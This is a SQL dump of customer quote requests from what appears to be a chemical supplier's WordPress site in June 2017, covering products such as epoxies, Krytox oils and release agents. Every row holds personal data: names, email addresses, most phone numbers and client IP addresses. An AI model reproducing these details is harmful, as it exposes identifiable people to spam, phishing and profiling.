INSERT INTO `wp_enquiry_detail_new` VALUES (1086, 'Angelie Miao', 'angelie.miao@163.com', 'Dear Sirs/Madams\n\n     I am Angelie Miao from Shanghai Sharelong Automation Equipment Co.Ltd, We want to buy 0.8Kg 240AD grease, Would you please give me price? Thank you very much!\n\nBest Regards!\nAngelie Miao', '', '240AD grease', '114.92.151.14', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"645";s:5:"title";s:5:"240AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_439560973.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-15 10:55:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1087, 'Rob Sharpe', 'robert.sharpe@ebas.me.uk', 'Hi,\nWe have been informed that MS-530 is now obselete. Please could you advise if there is a replacement product or approved alternate.\nThank you.\nKind Regards,\n\nRob', '+441279215332', 'Availability or Replacement', '91.202.137.150', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:23:"MS-530N Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-15 14:56:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1088, 'Suzie Fuente', 'suzie.fuente@evonik.com', 'Please quote minimum buy on this product', '251443-4107', 'Dry Film Release Agent', '208.60.60.254', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-15 16:28:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1089, 'Angel Cabrera', 'Angelcabrera@valcor.com', 'I would like a for the MS-580N solvent.\n\nThank you', '973467-8400', '', '23.24.72.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"9";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-15 18:21:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1090, 'Jason Sutin', 'jason.sutin@childrens.harvard.edu', 'RFQ for 1 cs of MS-222N', '617919-1310', 'RFQ for 1 cs of MS-222N', '134.174.21.190', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-15 20:22:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1091, 'Matthew Dirmyer', 'mdirmyer@lanl.gov', 'Hi,\n\nI\'d like to know pricing and unit size for MS-122ADL. Would the can be the same size as other aersol MS-122 products? If so could you please send a quote for 4 cans of the product.\n\nThanks,\nMatt\n', '505665-1879', 'Quote for MS-122ADL', '192.12.184.7', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2763";s:5:"title";s:9:"MS-122ADL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_318864752.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-15 21:08:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1092, 'Dennis Stemper', 'dennis@mwcoating.com', 'I have received an RFQ requiring this product.  Can you provide a Technical Data sheet?\n\nAlso, can you please provide pricing information per unit size?\n\nThank you,\nDennis', '815717-8914', 'TDS and Price/Unit Sizes', '98.228.13.68', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:38:"MS-143XD | Dry Film Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-15 22:42:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1093, 'JACKY ', 'company010@gexinshiye.com', 'dear Sir or Madam \n\nthis is jacky from shanghai gexinshiye company,china , we are looking for the HEXSION PRODUCT NAMED "EPOXY EPON164" and EPOXY EPON2004 ,, EPOXY EPON58005 and epon828 , would you pls help to give us the quotation and leadtime based on the MOQ package \n\nbest wishes\njacky xiao \ncompany010@gexinshiye.com ', '+8613918010805', '', '112.87.215.164', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"955";s:5:"title";s:11:"EPON™ 164";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-16 03:44:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1094, 'Teresa Pinto', 'teresa.pinto@globalfoundries.com', 'I would like a quote for 1 bottle of your Epoxy Stripping Agent MS-111. Thank you.', '845894-9652', 'Price quote for MS-111', '129.42.208.183', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-16 12:34:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1095, 'Teresa Pinto', 'teresa.pinto@globalfoundries.com', 'I would like a quote for 1 quart of your Epoxy Stripping Agent MS-111.', '845894-9652', 'Price quote for MS-111', '129.42.208.183', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-16 12:36:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1096, 'Philippe Bourrianne', 'pbourria@mit.edu', 'Hi,\n\nI would like to order 500g of Krytox107. Could you please send me an invoice?\n\nThanks in advance,\n\nBest,\nPhilippe', '', 'Orderr Krytox107', '18.189.104.82', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"442";s:5:"title";s:7:"GPL 107";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:91:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-pfpe-oil-grease-gpl.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-16 14:43:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1097, 'James Connaughton', 'jconnaughton@dow.com', 'Looking for a bulk price for Epoxy 907', '610244-6559', 'Epoxy 907', '204.136.186.145', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-16 15:53:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1098, 'Randi Morita-Sunada', 'randi.morita-sunada@navy.mil', 'Please provide pricing, availability, and best possible delivery with freight charges to Pearl Harbor Naval Shipyard, HI 96860.\n\nEpikure 3295\nQty 1 GL\n\nThank you!', '', 'RFQ', '138.163.128.41', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1209";s:5:"title";s:15:"EPIKURE™ 3295";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-16 21:40:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1099, 'Cynthia Sink', 'sinkc1@rjrt.com', 'I would like to purchase this product in either a 50ml or 100ml quantity. Would you please contact me with a price and how to proceed with the order.', '', 'Purchase Request', '71.71.67.179', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1185";s:5:"title";s:15:"EPIKURE™ 3234";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-19 01:39:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1100, 'Cynthia Sink', 'sinkc1@rjrt.com', 'I would like to purchase this product in either a 50ml or 100ml quantity. Would you please contact me with a price and how to proceed with the order.', '', 'Purchase Request', '71.71.67.179', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1185";s:5:"title";s:15:"EPIKURE™ 3234";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-19 01:39:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1101, 'Cynthia Sink', 'sinkc1@rjrt.com', 'I would like to purchase this product in either a 50ml or 100ml quantity. Would you please contact me with a price and how to proceed with the order.', '336741-3773', 'Purchase Request', '71.71.67.179', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"903";s:5:"title";s:11:"EPON™ 813";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-813.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-19 01:43:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1102, 'Tom Zhu', 'tzhu2@cisco.com', 'Get a quote for review ,thanks !', '', 'Quote', '64.104.125.227', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1668";s:5:"title";s:8:"MS-381HC";s:5:"price";s:0:"";s:5:"quant";s:1:"3";s:3:"img";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-19 02:24:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1103, 'joseph k', 'sourcing@heemankshi.com', 'Required grease', '939456-1655', 'krytox corrugator grease 227 fg', '49.15.141.219', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2746";s:5:"title";s:24:"227 FG Corrugator Grease";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_373451461.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-19 07:45:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1104, 'Sophia Yang', 'buy@hengdaigz.com', 'Dear Sir,\n\nThis is Sophia Yang of China Guangzhou HengDai Electronics Technologh Co.,Ltd.. I got your contact information from website.\n\nWe have an inquiry for Acrylic Conformal Coating MS-467C.Would you please kindly check if you have distributors in China? If yes, please do not hestitate to sned their contact information. \n\nYour kind reply will be great appreciated.\n\nThanks and await for you.', '', 'inquiry for MS-467C', '113.65.161.221', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"734";s:5:"title";s:7:"MS-467C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-467C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-19 09:57:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1105, 'Sherri Loch', 'sherri.loch@navy.mil', 'I would like a cost estimate on 1 ea.  55 gal drum\n\nThank you.', '360315-8432', 'Opteon™ Sion specialty fluid', '138.163.106.71', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-19 17:00:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1106, 'Carl Stoelzel', 'Carl_Stoelzel@VeroScience.com', 'I am looking to test Epon resin as a possible insulation for microelectrodes for non-human brain research. I would be comparing this to epoxylite.  \n\nIdeally I would like to request a small sample, or a quote for the smallest size container for initial testing.\n\nI would also need an appropriate hardener (on quote as well), and recommendations for a thinning agent .  This would be applied to bare metal wire 15-80 microns wide and I would like to have the minimal thickness of Epon possible.\n', '860614-0826', 'Epon resin 828', '70.183.11.99', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-19 17:45:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1107, 'Charles Crowe', 'cdc217@psu.edu', 'I wanted to inquire what amounts of Krytox 157 FSH are available for purchase and what the price of those would be.\n\nThank you!', '', 'Price Quote', '128.118.55.20', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-19 20:41:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1108, 'John Wilson', 'j.wilson@airsquared.com', 'Good Afternoon,\n\nCould I please get a quote for the MS-143TE PTFE Mold Release Agent\n\nThanks,\n\nJohn', '303466-2669', 'Quote', '50.253.106.193', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:35:"MS-143TE | PTFE Mold Release Agents";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-19 21:48:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1109, 'Etty Rotman', 'etty@dynamation.com', 'Please quote the following:\n\nEPIKURE 3295  qty 1 gallon\n\nNeed price and delivery. Urgent request.', '310477-1224', 'Price and delivery', '64.60.169.106', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1209";s:5:"title";s:15:"EPIKURE™ 3295";s:5:"price";s:0:"";s:5:"quant";s:1:"0";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-19 22:48:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1110, 'jing ', 'jing.lin@uni-ilm.de', 'Hello, I want to ask 2 question\nFirst, how much for one bottle od Epon Resin 828 and how much should I pay for the ship to Germany and the tax also\nSecond, I want to use this one to make carbon fiber electrode, is that possible to clean it with some chemical ', '', '', '134.60.42.76', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-20 09:20:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1111, 'jing', 'jing.lin@uni-ulm.de', 'Hello, I want to ask the price of Epon 828 and how  long for ship to Germany,\none more thing I want to know how can I clean it if i use it to make carbon fiber electrode\nThank you', '', 'price of Epon 828', '134.60.42.76', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-20 13:18:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1112, 'Scott Lane', 'lanex174@d.umn.edu', 'Using for research and would want the smallest amount possible. ', '', '', '131.212.176.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-20 14:32:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1113, 'Ben Green', 'bgreen@gastops.com', 'Hello,\nI was wondering if I could obtain a small sample of Krytox GPL101 oil in support of a collaborative research project with the University of Sherbrooke/McGill University.\nBest Regards,\nBen G.', '1613-744-3530', 'Research Sample', '207.236.97.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"436";s:5:"title";s:7:"GPL 101";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-20 17:34:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1114, 'Bobby Chasse', 'Bobby.Chasse@nordson.com', 'We are looking to apply a coating to help pull an undercut but have some application restrictions on materials - does this contain Silicon or is it a PTFE based coating?\n\nThank you,\nBobby', '', 'Material Inquiry', '12.226.211.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"4593";s:5:"title";s:51:"ReleaSys™ 7300 | Thermoplastic Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:102:"https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_568596037-e1497628609195.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-20 17:49:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1115, 'Ben Green', 'bgreen@gastops.com', 'Hello,\nI am wondering if it is possible to acquire a small (&lt;30ml) sample of Krytox GPL104 oil in support of a collaborative research project with the University of Sherbrooke/McGill University.\nBest Regards,\nBen G.', '1613-744-3530', 'Research Sample', '207.236.97.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"439";s:5:"title";s:7:"GPL 104";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease4.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-20 17:56:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1116, 'Lance', 'ldjones@bronaerotech.com', 'I am in need of a quote for 8 containers of 240AC with COC.  Please send pricing, MOQ, and lead time at your earliest convenience?  Thank you!', '303621-4040', 'RFQ for 240AC', '65.105.243.140', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"8";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-20 19:13:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1117, 'Michelle Becerra', 'michelle.becerra@wescoair.com', 'please provide me with the following information regarding item: MS-122XD PRFE Release Agent Dry lubricant in a  14 oz size (aerosol).\n-shelf life\n-storage temp.\n-manufacturing part no.\n\n\n', '512519-3911', 'inquiry ', '97.77.39.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-20 20:04:52', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1118, 'Robert Paist', 'binge@hungerwork.studio', 'Hello,\n\nI run a studio where we create rigid and semi rigid polyurethane parts.  For the past two years I have been using TraSys 825 on hot RTV silicone molds.  After reviewing your technical sheets I feel as though this may be a close replacement to TraSys 825 and may even improve our releases.  Would this be a suitable replacement for our application and is it possible to acquire a sample of this or any other suggested for testing in our studio?', '610256-3511', 'Releasys 8800 or better for my application.', '71.113.186.176', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"290";s:5:"title";s:47:"ReleaSys™ 8800 | Composite Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:102:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_259045955-e1494258222421.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-20 21:26:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1119, 'Troy Loughlin', 'tloughlin@tesla.com', 'Hi, \nI would like a quote for 2 cases of MS-555 flux remover.\n\nThanks', '1916-740-5250', 'RFQ - Tesla Motors', '209.133.79.7', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:2:"24";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-20 22:02:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1120, 'Daniel Hockaday', 'daniel.s.hockaday@uscg.mil', 'I am looking to get a quote to include shipping to 98350.  Thank you in advance.', '360374-6469', 'quote request', '152.121.19.252', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-21 03:43:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1121, 'Lovina Nnadi', 'lovina.nnadi@vsuremed.com', 'Hi,\n\nGood morning! We are a class III medical device Manufacturer in Galway, Ireland and looking for a bio compatible Lubricant that could release friction on our delivery system shaft and handle device.\nI saw your products online and would appreciate if I get a sample to try out and Quote for this.\nThanking you in advance and looking forward to hearing from you.\n\nKind Regards,\nLovina Nnadi\nSend to :\nLovina Nnadi\nVivasure Medical Ltd\nParkmore Business West Park\nGalway\nIreland.', '+35391395458', 'Sample for Synthetic Lubricants', '78.31.212.54', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"468";s:5:"title";s:44:"TriboSys™ Fluorinated Synthetic Lubricants";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:67:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Mi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-21 09:37:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1122, 'Jochyms', 'jochyms@crpp-bordeaux.cnrs.fr', 'Hello,\n\nI would like a quotation for a needle nose bottle of 2 oz.\n\nBest Regards\n\nQuentin Jochyms', '+330556843027', 'Krytox FSL', '147.210.83.91', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-21 11:41:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1123, 'Steve Noack', 'steve@padovatech.com', 'need a quote for 1 5 gallon drum, expedited shipping.', '', 'quote', '173.69.129.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1268";s:5:"title";s:11:"Vertrel SDG";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-sdg-3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-21 12:41:56', '', NULL, '', '', '', NULL, '', ''); 
